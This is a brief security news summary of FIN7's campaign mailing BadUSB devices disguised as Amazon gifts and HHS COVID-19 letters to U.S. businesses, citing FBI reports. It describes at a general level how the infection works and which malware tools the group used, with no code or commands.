A financially-motivated threat group has been targeting U.S. firms with BadUSB attacks in the past few months. BadUSB attacks are attempts to inject malware code into a computer via malicious USB devices without the possibility of being detected.

The BadUSB campaign

The FBI had received multiple reports of packages laden with USB devices, sent to U.S. businesses.
  • Researchers noted that the FIN7 group targeted a U.S. defense industry firm in November 2021.
  • In this incident, the group had used the Amazon thank-you letter to fool the victim.
  • FIN7 has been using this same BadUSB attack technique to target organizations in insurance and transportation since August 2021.

Anatomy of malicious packages

During the attacks, the attacker used two types of packages.
  • A package pretended to be from the U.S. Department of Health and Human Services (HHS) and contained letters of COVID-19 guidelines in a USB.
  • The second imitated a gift box package from Amazon, including a counterfeit gift card, fake thank you letter, and a USB. 
  • Both types of packages are LilyGO-branded USB devices and were sent using UPS and USPS services.

How does the infection work?

Plugging the USB drives into computers, the devices may execute a BadUSB attack, where the USB drive registers itself as a keyboard and sends a series of automated pre-configured keystrokes.
  • These keystrokes execute PowerShell commands that download and install different malware strains acting as backdoors. 
  • In one of the investigated cases, the group was observed obtaining admin access and moving laterally.
  • FIN7 used different tools, such as Metasploit, Cobalt Strike, PowerShell scripts, Carbanak, GRIFFON, DICELOADER, TIRION, and deployed BlackMatter and REvil ransomware.

Concluding notes

The recent attacks exhibit the innovations and desperation of cybercriminals to target their victims in multiple industries. According to the FBI, U.S. businesses should register themselves at the InfraGard portal to have access to the alert and get more info regarding FIN7’s BadUSB attacks.

Cyware Publisher